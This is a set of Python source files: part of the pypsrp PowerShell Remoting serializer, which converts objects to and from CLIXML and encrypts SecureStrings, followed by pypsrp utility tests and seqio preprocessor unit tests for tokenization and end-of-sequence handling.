"IE": self._serialize_ie,
"QUE": self._serialize_que,
"STK": self._serialize_stk,
"DCT": self._serialize_dct,
}[
metadata.tag
]
if value is None:
if metadata.optional:
return None
element = ET.Element("Nil")
else:
element_value = pack_function(metadata, value)
if isinstance(element_value, str):
element = ET.Element(metadata.tag)
element.text = element_value
else:
element = element_value
if metadata.name is not None:
element.attrib["N"] = metadata.name
if parent is not None:
parent.append(element)
return element
def deserialize(
self,
element: typing.Union[ET.Element, str],
metadata: typing.Optional[ObjectMeta] = None,
clear: bool = True,
) -> typing.Any:
if clear:
self._clear()
if isinstance(element, str):
element_string = element
try:
element = ET.fromstring(element)
except ET.ParseError as err:
log.warning("Failed to parse data '%s' as XML, return raw xml: %s" % (element_string, str(err)))
return element_string
else:
xml_string = ET.tostring(element, encoding="utf-8", method="xml")
element_string = to_string(xml_string)
metadata = metadata or ObjectMeta()
if metadata.tag == "*":
metadata.tag = element.tag
# get the object types so we store the TN Ref ids for later use
obj_types = self._get_types_from_obj(element)
# check if it is a primitive object
unpack_function: typing.Optional[typing.Callable[[ET.Element], typing.Any]] = {
# Primitive types
"S": lambda d: self._deserialize_string(d.text),
"ToString": lambda d: self._deserialize_string(d.text),
"C": lambda d: chr(int(d.text)),
"B": lambda d: d.text.lower() == "true",
"DT": lambda d: d.text,
"TS": lambda d: d.text,
"By": lambda d: int(d.text),
"SB": lambda d: int(d.text),
"U16": lambda d: int(d.text),
"I16": lambda d: int(d.text),
"U32": lambda d: int(d.text),
"I32": lambda d: int(d.text),
"U64": lambda d: int(d.text),
"I64": lambda d: int(d.text),
"Sg": lambda d: float(d.text),
"Db": lambda d: float(d.text),
"D": lambda d: d.text, # TODO: deserialize this
"BA": lambda d: base64.b64decode(d.text),
"G": lambda d: uuid.UUID(d.text),
"URI": lambda d: self._deserialize_string(d.text),
"Nil": lambda d: None,
"Version": lambda d: d.text,
"XD": lambda d: self._deserialize_string(d.text),
"SBK": lambda d: self._deserialize_string(d.text),
"SS": lambda d: self._deserialize_secure_string(d),
# references an object already deserialized
"Ref": lambda d: self.obj[d.attrib["RefId"]],
}.get(element.tag)
if unpack_function is not None:
return unpack_function(element)
# not a primitive object, so try and decode the complex object
if type(metadata) == ObjectMeta and metadata.object is None:
structures = {
"Selected.Microsoft.PowerShell.Commands.GenericMeasureInfo": ObjectMeta(
"Obj", object=CommandMetadataCount
),
"System.Array": ListMeta(),
"System.Collections.ArrayList": ListMeta(),
"System.Collections.Hashtable": DictionaryMeta(),
"System.Collections.Generic.List": ListMeta(),
"System.Collections.Queue": QueueMeta(),
"System.Collections.Stack": StackMeta(),
"System.ConsoleColor": ObjectMeta("Obj", object=Color),
"System.Management.Automation.CommandOrigin": ObjectMeta("Obj", object=CommandOrigin),
"System.Management.Automation.DebugRecord": ObjectMeta("Obj", object=DebugRecord),
"System.Management.Automation.ErrorRecord": ObjectMeta("Obj", object=ErrorRecordMessage),
"System.Management.Automation.Host.Coordinates": ObjectMeta("Obj", object=Coordinates),
"System.Management.Automation.Host.KeyInfo": ObjectMeta("Obj", object=KeyInfoDotNet),
"System.Management.Automation.Host.Size": ObjectMeta("Obj", object=Size),
"System.Management.Automation.InformationalRecord": ObjectMeta("Obj", object=InformationalRecord),
"System.Management.Automation.InformationRecord": ObjectMeta("Obj", object=InformationRecord),
"System.Management.Automation.ParameterMetadata": ObjectMeta("Obj", object=ParameterMetadata),
"System.Management.Automation.ProgressRecordType": ObjectMeta("Obj", object=ProgressRecordType),
"System.Management.Automation.PSBoundParametersDictionary": DictionaryMeta(),
"System.Management.Automation.PSCredential": ObjectMeta("Obj", object=PSCredential),
"System.Management.Automation.PSObject": ObjectMeta("ObjDynamic", object=GenericComplexObject),
"System.Management.Automation.PSPrimitiveDictionary": DictionaryMeta(),
"System.Management.Automation.PSTypeName": ObjectMeta("S"),
"System.Management.Automation.Remoting.RemoteHostMethodId": ObjectMeta(
"Obj", object=HostMethodIdentifier
),
"System.Management.Automation.Runspaces.ApartmentState": ObjectMeta("Obj", object=ApartmentState),
"System.Management.Automation.Runspaces.PipelineResultTypes": ObjectMeta(
"Obj", object=PipelineResultTypes
),
"System.Management.Automation.Runspaces.PSThreadOptions": ObjectMeta("Obj", object=PSThreadOptions),
"System.Management.Automation.Runspaces.RemoteStreamOptions": ObjectMeta(
"Obj", object=RemoteStreamOptions
),
"System.Management.Automation.SessionStateEntryVisibility": ObjectMeta(
"Obj", object=SessionStateEntryVisibility
),
"System.Management.Automation.VerboseRecord": ObjectMeta("Obj", object=VerboseRecord),
"System.Management.Automation.WarningRecord": ObjectMeta("Obj", object=WarningRecord),
"System.Globalization.CultureInfo": ObjectMeta("Obj", object=CultureInfo),
# Fallback to the GenericComplexObject
"System.Object": ObjectMeta("ObjDynamic", object=GenericComplexObject),
# Primitive types
"System.String": ObjectMeta("S"),
"System.Char": ObjectMeta("C"),
"System.Boolean": ObjectMeta("B"),
"System.DateTime": ObjectMeta("DT"),
# None: ObjectMeta("TS"), # duration timespan
"System.Byte": ObjectMeta("By"),
"System.SByte": ObjectMeta("SB"),
"System.UInt16": ObjectMeta("U16"),
"System.Int16": ObjectMeta("I16"),
"System.UInt32": ObjectMeta("U32"),
"System.Int32": ObjectMeta("I32"),
"System.UInt64": ObjectMeta("U64"),
"System.Int64": ObjectMeta("I64"),
"System.Single": ObjectMeta("Sg"),
"System.Double": ObjectMeta("Db"),
"System.Decimal": ObjectMeta("D"),
# None: ObjectMeta("BA"), # Byte array base64 encoded
"System.Guid": ObjectMeta("G"),
"System.Uri": ObjectMeta("URI"),
"System.Version": ObjectMeta("Version"),
"System.Xml.XmlDocument": ObjectMeta("XD"),
"System.Management.Automation.ScriptBlock": ObjectMeta("SBK"),
"System.Security.SecureString": ObjectMeta("SS"),
}
# fallback to GenericComplexObject if no types were defined
if metadata.tag == "Obj" and len(obj_types) == 0:
obj_types = ["System.Object"]
metadata = None
for obj_type in obj_types:
if obj_type.startswith("Deserialized.System."):
obj_type = obj_type[13:]
is_list = False
if obj_type.endswith("[]"):
obj_type = obj_type[0:-2]
is_list = True
elif obj_type.startswith("System.Collections.Generic.List`1[["):
list_info = obj_type[35:-1]
obj_type = list_info.split(",")[0]
is_list = True
elif obj_type.startswith("System.Collections.ObjectModel.Collection`1[["):
list_info = obj_type[45:-1]
obj_type = list_info.split(",")[0]
is_list = True
elif obj_type.startswith("System.Collections.ObjectModel.ReadOnlyCollection`1[["):
list_info = obj_type[53:-1]
obj_type = list_info.split(",")[0]
is_list = True
elif obj_type.startswith("System.Collections.Generic.Dictionary`2[["):
dict_meta = obj_type[41:-2].split("],[")
key_type = structures.get(dict_meta[0].split(",")[0], ObjectMeta())
value_type = structures.get(dict_meta[1].split(",")[0], ObjectMeta())
metadata = DictionaryMeta(dict_key_meta=key_type, dict_value_meta=value_type)
break
obj_meta = structures.get(obj_type)
if obj_meta is not None:
metadata = obj_meta
if is_list:
metadata = ListMeta(list_value_meta=metadata)
break
# we were unable to find the complex object type so just return the
# element
obj: typing.Any
if metadata is None:
obj = element_string
elif metadata.tag == "Obj":
obj = self._deserialize_obj(element, metadata)
elif metadata.tag == "ObjDynamic":
obj = self._deserialize_dynamic_obj(element, metadata)
elif metadata.tag == "LST":
obj = self._deserialize_lst(element, metadata)
elif metadata.tag == "QUE":
obj = self._deserialize_que(element)
elif metadata.tag == "STK":
obj = self._deserialize_stk(element)
elif metadata.tag == "DCT":
obj = self._deserialize_dct(element)
else:
log.warning("Unknown metadata tag type '%s', failed to deserialize object" % metadata.tag)
obj = element_string
if element.tag == "Obj":
self.obj[element.attrib["RefId"]] = obj
if isinstance(obj, ComplexObject):
obj._xml = element_string
return obj
def _get_tag_from_value(
self,
value: typing.Any,
) -> str:
        # Gets the XML tag based on the value type; this is a simple list
# and explicit tagging is recommended.
value_type = type(value)
if value_type == int:
return "I32"
elif value_type == bool:
return "B"
elif value_type == float:
return "Sg"
elif value_type == str:
return "S"
elif value_type == bytes:
# This will only occur in Python 3 as a byte string in Python 2 is
# a str. If users on that platform want a BA then they need to
# explicitly set the metadata themselves
return "BA"
elif value_type == uuid.UUID:
return "G"
elif value_type == list:
return "LST"
elif value_type == dict:
return "DCT"
elif isinstance(value, Queue):
return "QUE"
elif isinstance(value, GenericComplexObject):
return "ObjDynamic"
elif isinstance(value, ComplexObject):
return "Obj"
else:
# catch all, this probably isn't right but will not throw an
# error
return "S"
def _serialize_obj(
self,
metadata: ObjectMeta,
value: typing.Any,
) -> ET.Element:
obj = ET.Element("Obj", RefId=self._get_obj_id())
if len(value._types) > 0:
self._create_tn(obj, value._types)
to_string_value = value._to_string
if to_string_value is not None:
ET.SubElement(obj, "ToString").text = self._serialize_string(to_string_value)
for attr, property_meta in value._property_sets:
attr_value = getattr(value, attr)
self._create_obj(obj, attr_value, meta=property_meta)
def serialize_prop(parent: str, properties: typing.Tuple[typing.Tuple[str, ObjectMeta], ...]) -> None:
if len(properties) == 0:
return
parent_et = ET.SubElement(obj, parent)
for attr, property_meta in properties:
attr_value = getattr(value, attr)
self._create_obj(parent_et, attr_value, meta=property_meta)
serialize_prop("MS", value._extended_properties)
serialize_prop("Props", value._adapted_properties)
return obj
def _serialize_dynamic_obj(
self,
metadata: ObjectMeta,
value: typing.Any,
) -> ET.Element:
obj = ET.Element("Obj", RefId=self._get_obj_id())
self.obj[obj.attrib["RefId"]] = value
if len(value.types) > 0:
self._create_tn(obj, value.types)
if value.to_string is not None:
ET.SubElement(obj, "ToString").text = self._serialize_string(value.to_string)
for prop in value.property_sets:
self._create_obj(obj, prop)
def set_properties(element: str, prop_name: str) -> None:
prop_keys = list(getattr(value, prop_name).keys())
if len(prop_keys) == 0:
return
parent = ET.SubElement(obj, element)
prop_keys.sort()
for key in prop_keys:
prop = getattr(value, prop_name)[key]
self._create_obj(parent, prop, key=key)
set_properties("MS", "extended_properties")
set_properties("Props", "adapted_properties")
return obj
def _serialize_que(
self,
metadata: QueueMeta,
values: Queue,
) -> ET.Element:
obj = ET.Element("Obj", RefId=self._get_obj_id())
if not isinstance(metadata, QueueMeta):
metadata = QueueMeta(name=metadata.name, optional=metadata.optional)
self._create_tn(obj, metadata.list_types)
que = ET.SubElement(obj, "QUE")
while True:
try:
value = values.get(block=False)
self.serialize(value, metadata.list_value_meta, parent=que, clear=False)
except Empty:
break
return obj
def _serialize_stk(
self,
metadata: StackMeta,
values: typing.List,
) -> ET.Element:
obj = ET.Element("Obj", RefId=self._get_obj_id())
self._create_tn(obj, metadata.list_types)
stk = ET.SubElement(obj, "STK")
while True:
try:
value = values.pop()
self.serialize(value, metadata.list_value_meta, parent=stk, clear=False)
except IndexError:
break
return obj
def _serialize_ie(
self,
metadata: ListMeta,
values: typing.List,
) -> ET.Element:
return self._serialize_lst(metadata, values, tag="IE")
def _serialize_lst(
self,
metadata: ListMeta,
values: typing.List,
tag: str = "LST",
) -> ET.Element:
obj = ET.Element("Obj", RefId=self._get_obj_id())
if not isinstance(metadata, ListMeta):
metadata = ListMeta(name=metadata.name, optional=metadata.optional)
self._create_tn(obj, metadata.list_types)
lst = ET.SubElement(obj, tag)
for value in iter(values):
entry_meta = copy(metadata.list_value_meta)
self.serialize(value, entry_meta, parent=lst, clear=False)
return obj
def _serialize_dct(
self,
metadata: DictionaryMeta,
values: typing.Dict,
) -> ET.Element:
obj = ET.Element("Obj", RefId=self._get_obj_id())
if not isinstance(metadata, DictionaryMeta):
metadata = DictionaryMeta(name=metadata.name, optional=metadata.optional)
self._create_tn(obj, metadata.dict_types)
dct = ET.SubElement(obj, "DCT")
# allow dicts to be defined as a tuple so that the order is kept
iterator: typing.Iterable[typing.Tuple[typing.Any, typing.Any]]
if isinstance(values, tuple):
iterator = values
else:
iterator = values.items()
for key, value in iterator:
en = ET.SubElement(dct, "En")
key_meta = copy(metadata.dict_key_meta)
value_meta = copy(metadata.dict_value_meta)
self.serialize(key, key_meta, parent=en, clear=False)
self.serialize(value, value_meta, parent=en, clear=False)
return obj
def _serialize_string(
self,
value: typing.Optional[str],
) -> typing.Optional[str]:
if value is None:
return None
def rplcr(matchobj):
surrogate_char = matchobj.group(0)
byte_char = to_bytes(surrogate_char, encoding="utf-16-be")
hex_char = to_unicode(binascii.hexlify(byte_char)).upper()
hex_split = [hex_char[i : i + 4] for i in range(0, len(hex_char), 4)]
return "".join(["_x%s_" % i for i in hex_split])
# before running the translation we need to make sure _ before x is
# encoded, normally _ isn't encoded except when preceding x
string_value = to_unicode(value)
# The MS-PSRP docs don't state this but the _x0000_ matcher is case insensitive so we need to make sure we
# escape _X as well as _x.
string_value = re.sub("(?i)_(x)", "_x005F_\\1", string_value)
string_value = re.sub(self._serial_str, rplcr, string_value)
return string_value
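    # Illustrative escaping performed by _serialize_string above:
    #   "a_xb\n" -> "a_x005F_xb_x000A_"
    # The literal "_x" is escaped to "_x005F_x" first, then the C0 control
    # character U+000A is hex encoded as "_x000A_".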
def _serialize_secure_string(
self,
value: str,
) -> str:
if self.cipher is None:
raise SerializationError("Cannot generate secure string as cipher is not initialised")
# convert the string to a UTF-16 byte string as that is what is
# expected in Windows. If a byte string (native string in Python 2) was
# passed in, the sender must make sure it is a valid UTF-16
# representation and not UTF-8 or else the server will fail to decrypt
# the secure string in most cases
string_bytes = to_bytes(value, encoding="utf-16-le")
padder = PKCS7(self.cipher.algorithm.block_size).padder()
padded_data = padder.update(string_bytes) + padder.finalize()
encryptor = self.cipher.encryptor()
ss_value = encryptor.update(padded_data) + encryptor.finalize()
ss_string = to_string(base64.b64encode(ss_value))
return ss_string
def _deserialize_obj(
self,
element: ET.Element,
metadata: ObjectMeta,
) -> typing.Any:
obj = metadata.object() # type: ignore[misc] # Caller always sets object
self.obj[element.attrib["RefId"]] = obj
to_string_value = element.find("ToString")
if to_string_value is not None:
obj._to_string = self._deserialize_string(to_string_value.text)
def deserialize_property(prop_tag: str, properties: typing.Tuple[typing.Tuple[str, ObjectMeta], ...]) -> None:
for attr, property_meta in properties:
if attr == "invocation_info":
a = ""
property_name = "Unknown"
property_filter = ""
if property_meta.name is not None:
property_name = property_meta.name
property_filter = "[@N='%s']" % property_meta.name
tags = [property_meta.tag]
# The below tags are actually seen as Obj in the parent element
if property_meta.tag in ["DCT", "LST", "IE", "QUE", "STK", "ObjDynamic"]:
tags = ["Obj", "Ref"]
val = None
for tag in tags:
val = element.find("%s%s%s" % (prop_tag, tag, property_filter))
if val is not None:
break
if val is None and not property_meta.optional:
val = element.find("%sNil%s" % (prop_tag, property_filter))
if val is None:
obj_name = str(obj) if obj._to_string is not None else "Unknown"
err_msg = "Mandatory return value for '%s' was not found on object %s" % (
property_name,
obj_name,
)
raise SerializationError(err_msg)
val = None
elif val is not None:
val = self.deserialize(val, property_meta, clear=False)
setattr(obj, attr, val)
deserialize_property("", obj._property_sets)
deserialize_property("Props/", obj._adapted_properties)
deserialize_property("MS/", obj._extended_properties)
return obj
def _deserialize_dynamic_obj(
self,
element: ET.Element,
metadata: ObjectMeta,
) -> typing.Any:
obj = metadata.object() # type: ignore[misc] # Caller always sets object
self.obj[element.attrib["RefId"]] = obj
for obj_property in element:
if obj_property.tag == "TN":
for obj_type in obj_property:
obj.types.append(obj_type.text)
self.tn[obj_property.attrib["RefId"]] = obj.types
elif obj_property.tag == "TNRef":
obj.types = self.tn[obj_property.attrib["RefId"]]
elif obj_property.tag == "Props":
for adapted_property in obj_property:
key = adapted_property.attrib["N"]
value = self.deserialize(adapted_property, clear=False)
obj.adapted_properties[key] = value
elif obj_property.tag == "MS":
for extended_property in obj_property:
key = extended_property.attrib["N"]
value = self.deserialize(extended_property, clear=False)
obj.extended_properties[key] = value
elif obj_property.tag == "ToString":
value = self.deserialize(obj_property, clear=False)
obj.to_string = value
else:
value = self.deserialize(obj_property, clear=False)
obj.property_sets.append(value)
return obj
def _deserialize_lst(
self,
element: ET.Element,
metadata: typing.Optional[ObjectMeta] = None,
) -> typing.List:
list_value = []
value_meta = getattr(metadata, "list_value_meta", None)
entries = element.find("LST")
for entry in entries or []:
entry_value = self.deserialize(entry, value_meta, clear=False)
list_value.append(entry_value)
return list_value
def _deserialize_que(
self,
element: ET.Element,
) -> Queue:
queue: Queue = Queue()
entries = element.find("QUE")
for entry in entries or []:
entry_value = self.deserialize(entry, clear=False)
queue.put(entry_value)
return queue
def _deserialize_stk(
self,
element: ET.Element,
) -> typing.List:
# no native Stack object in Python so just use a list
stack = []
entries = element.find("STK")
for entry in entries or []:
entry_value = self.deserialize(entry, clear=False)
stack.append(entry_value)
return stack
def _deserialize_dct(
self,
element: ET.Element,
) -> typing.Dict:
dictionary = {}
entries = element.findall("DCT/En")
for entry in entries:
key = entry.find("*[@N='Key']")
value = entry.find("*[@N='Value']")
key = self.deserialize(key if key is not None else "", clear=False)
value = self.deserialize(value if value is not None else "", clear=False)
dictionary[key] = value
return dictionary
def _deserialize_string(
self,
value: typing.Optional[str],
) -> str:
if value is None:
return ""
def rplcr(matchobj):
# The matched object is the UTF-16 byte representation of the UTF-8
# hex string value. We need to decode the byte str to unicode and
# then unhexlify that hex string to get the actual bytes of the
# _x****_ value, e.g.
# group(0) == b"\x00_\x00x\x000\x000\x000\x00A\x00_"
# group(1) == b"\x000\x000\x000\x00A"
# unicode (from utf-16-be) == u"000A"
# returns b"\x00\x0A"
match_hex = matchobj.group(1)
hex_string = to_unicode(match_hex, encoding="utf-16-be")
return binascii.unhexlify(hex_string)
# need to ensure we start with a unicode representation of the string
# so that we can get the actual UTF-16 bytes value from that string
unicode_value = to_unicode(value)
unicode_bytes = to_bytes(unicode_value, encoding="utf-16-be")
bytes_value = re.sub(self._deserial_str, rplcr, unicode_bytes)
return to_unicode(bytes_value, encoding="utf-16-be")
def _deserialize_secure_string(self, value: ET.Element) -> typing.Union[ET.Element, str]:
if self.cipher is None:
# cipher is not set up so we can't decrypt the string, just return
# the raw element
return value
ss_string = base64.b64decode(value.text or "")
decryptor = self.cipher.decryptor()
decrypted_bytes = decryptor.update(ss_string) + decryptor.finalize()
unpadder = PKCS7(self.cipher.algorithm.block_size).unpadder()
unpadded_bytes = unpadder.update(decrypted_bytes) + unpadder.finalize()
decrypted_string = to_unicode(unpadded_bytes, "utf-16-le")
return decrypted_string
def _clear(self) -> None:
self.obj_id = 0
self.obj = {}
self.tn = {}
self.tn_id = 0
def _get_obj_id(self) -> str:
ref_id = str(self.obj_id)
self.obj_id += 1
return ref_id
def _get_types_from_obj(
self,
element: ET.Element,
) -> typing.List[str]:
obj_types = [e.text or "" for e in element.findall("TN/T")]
if len(obj_types) > 0:
ref_id = element.find("TN").attrib["RefId"] # type: ignore[union-attr] # Mandated by the spec
self.tn[ref_id] = obj_types
tn_ref = element.find("TNRef")
if tn_ref is not None:
ref_id = tn_ref.attrib["RefId"]
obj_types = self.tn[ref_id]
return obj_types
def _create_tn(
self,
parent: ET.Element,
types: typing.List[str],
) -> None:
main_type = types[0]
ref_id = self.tn.get(main_type, None)
if ref_id is None:
ref_id = self.tn_id
self.tn_id += 1
self.tn[main_type] = ref_id
tn = ET.SubElement(parent, "TN", RefId=str(ref_id))
for type_name in types:
ET.SubElement(tn, "T").text = type_name
else:
ET.SubElement(parent, "TNRef", RefId=str(ref_id))
def _create_obj(
self,
parent: ET.Element,
obj: typing.Any,
key: typing.Optional[str] = None,
meta: typing.Optional[ObjectMeta] = None,
) -> None:
if isinstance(obj, ComplexObject):
for ref, value in self.obj.items():
if value == obj:
sub_element = ET.SubElement(parent, "Ref", RefId=ref)
if key is not None:
sub_element.attrib["N"] = key
return
if meta is None:
meta = ObjectMeta(name=key)
self.serialize(obj, metadata=meta, parent=parent, clear=False)
class TaggedValue(object):
def __init__(
self,
tag: str,
value: typing.Any,
) -> None:
self.tag = tag
self.value = value
```
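A short round-trip sketch for the serializer above (illustrative; it assumes `pypsrp` is importable and only exercises primitive CLIXML tags):
```python
import xml.etree.ElementTree as ET

from pypsrp.serializer import Serializer, TaggedValue

serializer = Serializer()

# Primitive tags are inferred from the Python type: str -> S, int -> I32.
element = serializer.serialize("abc")
print(ET.tostring(element))  # b'<S>abc</S>'

# TaggedValue forces an explicit tag instead of the inferred one.
element = serializer.serialize(TaggedValue("U32", 123))
print(ET.tostring(element))  # b'<U32>123</U32>'

# Deserialization accepts either an Element or a raw XML string.
print(serializer.deserialize("<U32>123</U32>"))  # 123
```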
#### File: pypsrp/tests/test_utils.py
```python
import pytest
from pypsrp._utils import (
get_hostname,
to_bytes,
to_string,
to_unicode,
version_equal_or_newer,
)
def test_unicode_to_bytes_default():
expected = b"\x61\x62\x63"
actual = to_bytes("abc")
assert actual == expected
def test_unicode_to_bytes_diff_encoding():
expected = b"\x61\x00\x62\x00\x63\x00"
actual = to_bytes("abc", encoding="utf-16-le")
assert actual == expected
def test_bytes_to_bytes():
expected = b"\x01\x02\x03\x04"
actual = to_bytes(b"\x01\x02\x03\x04")
assert actual == expected
def test_str_to_bytes():
# Python 3 the default string type is unicode so the expected value will
# be "abc" in UTF-16 form while Python 2 "abc" is the bytes representation
# already
expected = b"\x61\x00\x62\x00\x63\x00"
actual = to_bytes("abc", encoding="utf-16-le")
assert actual == expected
def test_unicode_to_unicode():
expected = "abc"
actual = to_unicode("abc")
assert actual == expected
def test_byte_to_unicode():
expected = "abc"
actual = to_unicode(b"\x61\x62\x63")
assert actual == expected
def test_byte_to_unicode_diff_encoding():
expected = "abc"
actual = to_unicode(b"\x61\x00\x62\x00\x63\x00", encoding="utf-16-le")
assert actual == expected
def test_str_to_unicode():
expected = "a\x00b\x00c\x00"
actual = to_unicode("a\x00b\x00c\x00", encoding="utf-16-le")
assert actual == expected
def test_to_str():
assert str(to_string).startswith("<function to_unicode")
@pytest.mark.parametrize(
"version, reference_version, expected",
[
["2.2", "2.3", False],
["2.3", "2.3", True],
["2.4", "2.3", True],
["3", "2.3", True],
["3.0", "2.3", True],
["1", "2.3", False],
["1.0", "2.3", False],
["2.3.0", "2.3", True],
["2.3.1", "2.3", True],
["2.3", "2.3.0", True],
["2.3", "2.3.1", False],
],
)
def test_version_newer(version, reference_version, expected):
assert version_equal_or_newer(version, reference_version) == expected
@pytest.mark.parametrize(
"url, expected",
[
# hostname
["http://hostname", "hostname"],
["https://hostname", "hostname"],
["http://hostname:1234", "hostname"],
["https://hostname:1234", "hostname"],
["http://hostname/path", "hostname"],
["https://hostname/path", "hostname"],
["http://hostname:1234/path", "hostname"],
["https://hostname:1234/path", "hostname"],
# fqdn
["http://hostname.domain.com", "hostname.domain.com"],
["https://hostname.domain.com", "hostname.domain.com"],
["http://hostname.domain.com:1234", "hostname.domain.com"],
["https://hostname.domain.com:1234", "hostname.domain.com"],
["http://hostname.domain.com/path", "hostname.domain.com"],
["https://hostname.domain.com/path", "hostname.domain.com"],
["http://hostname.domain.com:1234/path", "hostname.domain.com"],
["https://hostname.domain.com:1234/path", "hostname.domain.com"],
# ip address
["http://1.2.3.4", "1.2.3.4"],
["https://1.2.3.4", "1.2.3.4"],
["http://1.2.3.4:1234", "1.2.3.4"],
["https://1.2.3.4:1234", "1.2.3.4"],
["http://1.2.3.4/path", "1.2.3.4"],
["https://1.2.3.4/path", "1.2.3.4"],
["http://1.2.3.4:1234/path", "1.2.3.4"],
["https://1.2.3.4:1234/path", "1.2.3.4"],
],
)
def test_get_hostname(url, expected):
assert expected == get_hostname(url)
``` |
{
"source": "00mjk/seqio",
"score": 2
} |
#### File: seqio/seqio/preprocessors_test.py
```python
from absl.testing import absltest
from seqio import dataset_providers
from seqio import preprocessors
from seqio import test_utils
import tensorflow.compat.v2 as tf
assert_dataset = test_utils.assert_dataset
Feature = dataset_providers.Feature
class PreprocessorsTest(tf.test.TestCase):
def test_tokenize(self):
og_dataset = tf.data.Dataset.from_tensors({
'prefix': 'This is',
'suffix': 'a test.'
})
output_features = {
'prefix': Feature(
test_utils.MockVocabulary({'This is': [0, 1]}), add_eos=True),
'suffix': Feature(
test_utils.MockVocabulary({'a test.': [2, 3]}), add_eos=False),
}
assert_dataset(
preprocessors.tokenize(og_dataset, output_features=output_features), {
'prefix': [0, 1],
'prefix_pretokenized': 'This is',
'suffix': [2, 3],
'suffix_pretokenized': 'a test.'
})
assert_dataset(
preprocessors.tokenize(
og_dataset, output_features=output_features,
copy_pretokenized=False),
{
'prefix': [0, 1],
'suffix': [2, 3]
})
assert_dataset(
preprocessors.tokenize_and_append_eos(
og_dataset, output_features=output_features,
copy_pretokenized=False),
{
'prefix': [0, 1, 1],
'suffix': [2, 3]
})
def test_tokenize_multiple_ranks(self):
vocab = test_utils.sentencepiece_vocab()
output_features = {
'prefix': Feature(vocab, add_eos=True),
'suffix': Feature(vocab, add_eos=False),
}
# Test for 1-rank features.
og_dataset_1d = tf.data.Dataset.from_tensors({
'prefix': ['This is', 'this is'],
'suffix': ['a test.', 'another']
})
assert_dataset(
preprocessors.tokenize(og_dataset_1d, output_features=output_features),
{
'prefix': [[3, 2, 20, 8, 6, 3, 8, 6], [11, 8, 6, 3, 8, 6]],
'prefix_pretokenized': ['This is', 'this is'],
'suffix': [[3, 5, 10, 2], [3, 5, 22, 7, 24, 20, 4, 23]],
'suffix_pretokenized': ['a test.', 'another']
})
assert_dataset(
preprocessors.tokenize(
og_dataset_1d, output_features=output_features, with_eos=True), {
'prefix': [[3, 2, 20, 8, 6, 3, 8, 6], [11, 8, 6, 3, 8, 6, 1]],
'prefix_pretokenized': ['This is', 'this is'],
'suffix': [[3, 5, 10, 2], [3, 5, 22, 7, 24, 20, 4, 23]],
'suffix_pretokenized': ['a test.', 'another']
})
# Test for 2-rank features.
og_dataset_2d = tf.data.Dataset.from_tensors({
'prefix': [['This is'], ['this is']],
'suffix': [['a test.'], ['another']]
})
assert_dataset(
preprocessors.tokenize(og_dataset_2d, output_features=output_features),
{
'prefix': [[[3, 2, 20, 8, 6, 3, 8, 6]], [[11, 8, 6, 3, 8, 6]]],
'prefix_pretokenized': [['This is'], ['this is']],
'suffix': [[[3, 5, 10, 2]], [[3, 5, 22, 7, 24, 20, 4, 23]]],
'suffix_pretokenized': [['a test.'], ['another']]
})
assert_dataset(
preprocessors.tokenize(
og_dataset_2d, output_features=output_features, with_eos=True), {
'prefix': [[[3, 2, 20, 8, 6, 3, 8, 6, 1]],
[[11, 8, 6, 3, 8, 6, 1]]],
'prefix_pretokenized': [['This is'], ['this is']],
'suffix': [[[3, 5, 10, 2]], [[3, 5, 22, 7, 24, 20, 4, 23]]],
'suffix_pretokenized': [['a test.'], ['another']]
})
# Test for 3-rank features.
og_dataset_3d = tf.data.Dataset.from_tensors({
'prefix':
tf.ragged.constant([[['a', 'b'], ['c']], [['d', 'e'], ['f']],
[['g', 'h'], ['i']]]),
'suffix':
tf.ragged.constant([[['j'], ['k', 'l', 'm']], [['n'], ['o', 'p']]]),
})
assert_dataset(
preprocessors.tokenize(og_dataset_3d, output_features=output_features),
{
'prefix': [[[[3, 5], [3, 2]], [[3, 13]]],
[[[3, 21], [3, 4]], [[3, 2]]],
[[[3, 2], [3, 20]], [[3, 8]]]],
'prefix_pretokenized': [[['a', 'b'], ['c']], [['d', 'e'], ['f']],
[['g', 'h'], ['i']]],
'suffix': [[[[3, 2]], [[3, 2], [3, 9], [3, 14]]],
[[[3, 22]], [[3, 7], [3, 15]]]],
'suffix_pretokenized': [[['j'], ['k', 'l', 'm']], [['n'],
['o', 'p']]],
})
assert_dataset(
preprocessors.tokenize(
og_dataset_3d, output_features=output_features, with_eos=True),
{
'prefix': [[[[3, 5], [3, 2, 1]], [[3, 13, 1]]],
[[[3, 21], [3, 4, 1]], [[3, 2, 1]]],
[[[3, 2], [3, 20, 1]], [[3, 8, 1]]]],
'prefix_pretokenized': [[['a', 'b'], ['c']], [['d', 'e'], ['f']],
[['g', 'h'], ['i']]],
'suffix': [[[[3, 2]], [[3, 2], [3, 9], [3, 14]]],
[[[3, 22]], [[3, 7], [3, 15]]]],
'suffix_pretokenized': [[['j'], ['k', 'l', 'm']], [['n'],
['o', 'p']]],
})
def test_append_eos(self):
# Features for this test:
# name | shape | add_eos | seq_length
# ---------+-----------+---------+-----------
# inputs | [3] | False | 4
# targets | [4] | True | 3
# arrows | [4] | True | 5
# strings | [3, 2] | True | 3
# feathers | [3, None] | True | 4
# bows | [2] | n/a | 1
og_dataset = tf.data.Dataset.from_tensors({
'inputs': [1, 2, 3],
'targets': [4, 5, 6, 7],
'arrows': [8, 9, 10, 11],
'strings': [[14, 15], [16, 17], [18, 19]],
'feathers': tf.ragged.constant([[20, 21], [], [22, 23, 24, 25, 26]]),
'bows': [12, 13],
})
vocab = test_utils.sentencepiece_vocab()
output_features = {
'inputs': Feature(vocab, add_eos=False),
'targets': Feature(vocab, add_eos=True),
'arrows': Feature(vocab, add_eos=True),
'strings': Feature(vocab, add_eos=True),
'feathers': Feature(vocab, add_eos=True),
}
sequence_length = {
'inputs': 4,
'targets': 3,
'arrows': 5,
'strings': 3,
'feathers': 4,
'bows': 1 # note: ignored, since bows is not in output_features.
}
# Add eos only.
assert_dataset(
preprocessors.append_eos(og_dataset, output_features), {
'inputs': [1, 2, 3],
'targets': [4, 5, 6, 7, 1],
'arrows': [8, 9, 10, 11, 1],
'strings': [[14, 15, 1], [16, 17, 1], [18, 19, 1]],
'feathers': [[20, 21, 1], [1], [22, 23, 24, 25, 26, 1]],
'bows': [12, 13],
})
# Trim to sequence lengths.
assert_dataset(
preprocessors.append_eos_after_trim(
og_dataset,
output_features=output_features,
sequence_length=sequence_length), {
'inputs': [1, 2, 3],
'targets': [4, 5, 1],
'arrows': [8, 9, 10, 11, 1],
'strings': [[14, 15, 1], [16, 17, 1], [18, 19, 1]],
'feathers': [[20, 21, 1], [1], [22, 23, 24, 1]],
'bows': [12, 13],
})
